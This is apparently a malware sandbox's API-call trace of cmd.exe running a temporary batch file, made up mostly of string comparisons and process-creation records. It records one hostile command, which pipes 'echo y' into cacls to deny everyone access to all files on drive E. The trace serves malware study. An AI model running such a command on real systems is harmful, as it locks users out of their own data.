(_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.688] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.689] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.689] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.689] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x80, hThread=0x94, dwProcessId=0x6b8, dwThreadId=0x6a8)) returned 1 [0036.693] CloseHandle (hObject=0x94) returned 1 [0036.693] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.693] GetEnvironmentStringsW () returned 0xd1b020* [0036.693] FreeEnvironmentStringsA (penv="=") returned 1 [0036.693] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.693] _get_osfhandle (_FileHandle=3) returned 0x8c [0036.693] DuplicateHandle (in: hSourceProcessHandle=0x80, hSourceHandle=0x8c, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0036.693] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0036.693] _close (_FileHandle=5) returned 0 [0036.693] _dup (_FileHandle=0) returned 4 [0036.693] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0036.693] _close (_FileHandle=3) returned 0 [0036.693] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.693] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.693] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.693] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.693] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.693] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.693] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.693] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.693] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.693] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.693] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.693] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.693] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.693] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.693] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.693] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.693] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.693] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.693] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.693] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.693] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.693] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.693] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.693] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.693] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.694] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.694] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.694] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.694] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.694] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.694] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.694] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.694] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.694] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.694] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.694] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.694] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.694] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.694] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.694] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.694] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.694] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.694] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.694] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.694] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.694] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.694] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.694] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.694] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.694] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.694] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.694] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.694] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.694] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.694] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.694] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.694] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.694] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.694] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.695] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.695] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.695] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.695] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.695] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0036.695] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0036.695] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0036.695] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0036.695] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0036.695] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0036.695] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0036.695] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0036.695] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0036.695] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0036.695] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0036.695] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0036.695] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0036.695] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0036.695] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0036.695] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0036.695] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0036.695] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0036.695] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0036.695] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0036.695] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0036.695] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0036.695] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0036.695] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0036.695] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0036.695] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0036.695] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0036.695] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0036.695] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0036.695] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0036.695] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0036.695] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0036.695] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0036.695] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0036.695] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0036.695] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0036.695] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0036.695] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0036.695] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0036.695] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0036.695] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0036.695] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0036.695] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0036.695] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0036.695] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0036.696] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.696] SetErrorMode (uMode=0x0) returned 0x0 [0036.696] SetErrorMode (uMode=0x1) returned 0x0 [0036.696] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd18080, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0036.696] SetErrorMode (uMode=0x0) returned 0x1 [0036.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.696] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.696] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.696] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.696] GetLastError () returned 0x2 [0036.696] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.696] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0036.696] GetLastError () returned 0x2 [0036.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18268 [0036.696] FindClose (in: hFindFile=0xd18268 | out: hFindFile=0xd18268) returned 1 [0036.696] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.696] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.696] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0036.697] SetErrorMode (uMode=0x0) returned 0x0 [0036.697] SetErrorMode (uMode=0x1) returned 0x0 [0036.697] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1b028, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0036.697] SetErrorMode (uMode=0x0) returned 0x1 [0036.697] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.697] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0036.697] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.697] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.697] GetLastError () returned 0x2 [0036.697] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0036.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.697] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0036.697] GetLastError () returned 0x2 [0036.697] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd18550 [0036.697] FindClose (in: hFindFile=0xd18550 | out: hFindFile=0xd18550) returned 1 [0036.697] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0036.697] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0036.697] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.698] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0036.698] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0036.698] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0036.698] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0036.699] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0036.699] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0036.699] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"E:\\*.*\" /e /d everyone", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"E:\\*.*\" /e /d everyone", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="cacls \"E:\\*.*\" /e /d everyone", lpProcessInformation=0xc8ee4c*(hProcess=0x94, hThread=0x8c, dwProcessId=0x770, dwThreadId=0xbfc)) returned 1 [0036.702] CloseHandle (hObject=0x8c) returned 1 [0036.702] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0036.702] GetEnvironmentStringsW () returned 0xd1b190* [0036.702] FreeEnvironmentStringsA (penv="=") returned 1 [0036.702] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0036.702] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0036.702] _close (_FileHandle=4) returned 0 [0036.702] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) returned 0x0 [0036.777] GetExitCodeProcess (in: hProcess=0x80, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x0) returned 1 [0036.778] CloseHandle (hObject=0x80) returned 1 [0036.778] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0036.780] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0xc8f1c0 | out: lpExitCode=0xc8f1c0*=0x3) returned 1 [0036.780] CloseHandle (hObject=0x94) returned 1 [0036.780] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.780] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0036.780] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.780] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0036.780] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.780] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.780] SetConsoleInputExeNameW () returned 0x1 [0036.780] GetConsoleOutputCP () returned 0x1b5 [0036.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.780] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.781] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0036.781] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0036.781] _get_osfhandle (_FileHandle=3) returned 0x94 [0036.781] 